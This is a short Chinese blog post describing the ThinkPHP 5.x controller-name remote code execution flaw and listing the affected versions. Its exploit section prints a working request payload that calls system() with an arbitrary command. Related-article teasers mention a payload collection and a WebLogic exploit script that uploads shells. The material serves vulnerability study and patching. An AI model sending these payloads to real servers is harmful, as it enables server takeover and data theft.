ThinkPHP5.x rec漏洞

最新推荐文章于 2025-03-27 00:00:00 发布

「已注销」

最新推荐文章于 2025-03-27 00:00:00 发布

阅读量510

点赞数

本文链接：https://blog.youkuaiyun.com/m0_46387542/article/details/108748342

版权

由于ThinkPHP5框架未对控制器名做足够安全检测，在未开启强制路由情况下，存在远程代码执行漏洞，黑客可通过构造特定请求直接获取WebShell。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞详情

由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。

影响版本

ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31

漏洞利用

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令行命令]

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

thinkPHP3.x日志泄露漏洞复现

千寻的博客

12-18

3468

漏洞名称 thinkPHP3.x日志泄露漏洞描述 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志，而且debug很多网站都没有关 ThinkPHP默认安装后，也会在Runtime目录下生成日志日志很容易被猜解到，而且日志里面有执行SQL语句的记录影响版本 thinkPHP3.2 thinkPHP3. 漏洞分析 THINKPHP3.2 结构：Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构：Runti

Thinkphp漏洞

weixin_43873557的博客

02-06

1125

➢ Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用很多cms就是基于thinkphp二次开发的，所以thinkphp出问题的话，会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin

参与评论您还未登录，请先登录后发表或查看评论

ThinkPHP漏洞合集（专注渗透视角）

LainWith的博客

04-11

1万+

服务框架是指某领域一类服务的可复用设计与不完整的实现，与软件框架不同的是，服务框架同时体现着面向服务，一个服务框架可以分为两个主要部分：服务引擎、引入的外部服务。ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据，渐渐成为单位公共安全中最具有战略性的资产，框架的安全稳定运行也直接决定着业务系统能否正常使用。

PHP框架 ThinkPHP 漏洞探测分析

热门推荐

FY10033的博客

05-04

1万+

tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi

常见框架漏洞（一）----Thinkphp（TP）

qq_65379983的博客

03-25

950

远程代码执行

ThinkPHP5.x rec 漏洞分析与复现

MercyLin的博客

09-27

7621

https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 先贴个漏洞预警,这里做一些内容摘要: 漏洞描述由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。...

Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1

08-03

### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行（RCE）漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行（RCE）漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...

ThinkPHP 5.x RCE 漏洞分析与利用总结

dengzhasong7076的博客

01-21

5074

近日ThinkPHP出现由于变量覆盖而引起的RCE，其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖，通过覆盖类的核心属性filter导致rce，其攻击点较为多，有些还具有限制条件，另外由于种种部分原因，在利用上会出现一些问题。例如: 1、大部分payload进入最后rce的函数是调用了call_user_func，其...

ThinkPHP 3.2.x RCE漏洞复现

m0_46616663的博客

11-29

2506

打湖湘杯遇到一个类似的willphp题目，都审到cfile了没做出来。。。于是把这个翻出来搞了一波，过程参考了网上别的师傅的0.0 什么是ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初，2007年元旦正式更名为ThinkPHP，并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。并且拥有众多原创功能和特性，在社区团队的积极参与下，在易用性、扩展性和性能方面不

thinkphp 一键漏洞检测

12-09

thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试

Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本

09-30

Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。命令执行并回显直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp

PHP 开发框架安全：ThinkPHP 序列漏洞测试.

网络安全领域___专研者.

05-06

1215

ThinkPHP 是一个流行的国内PHP 框架，它提供了一套完整的安全措施来帮助开发者构建安全可靠的 web 应用程序。ThinkPHP 本身不断更新和改进，以应对新的安全威胁和漏洞

ThinkPHP历史漏洞

HAKUNAMATATATTA的博客

12-30

6770

Thinkphp 是一种开源框架。是一个由国人开发的支持windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的，所以 thinkphp 出问题的话，会影响很多基于 thinkphp开发的网站。

thinkphp漏洞总结

bhegi_seg的博客

07-31

1237

thinkphp是一个国内轻量级的开发框架，采用php+apache，在更新迭代中，thinkphp也经常爆出各种漏洞，thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本，前两个版本已经停止更新，主要介绍下thinkphp5的漏洞。...

ThinkPHP漏洞总结

文公子的博客

11-03

2880

ThinkPHP漏洞总结 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架，遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重开发体验和易用性，为 WEB 应用和 API 开发提供了强有力的支持。 0x00前言本篇文章将针对ThinkPHP的历史漏洞进行整理复现，今后爆出的ThinkPHP漏洞，也将进行补充更新。 0x01ThinkPHP远程命令执行/代码执行漏洞一，ThinkPHP

ThinkPHP 5.x 批量获取Shell漏洞POC解析

### ThinkPHP5.X框架的安全漏洞利用 #### 1. ThinkPHP框架概述 ThinkPHP是一个流行的PHP Web应用框架，它基于MVC设计模式。由于其易用性和灵活性，很多开发者选择ThinkPHP来开发网站和Web应用。ThinkPHP5.x是该框架...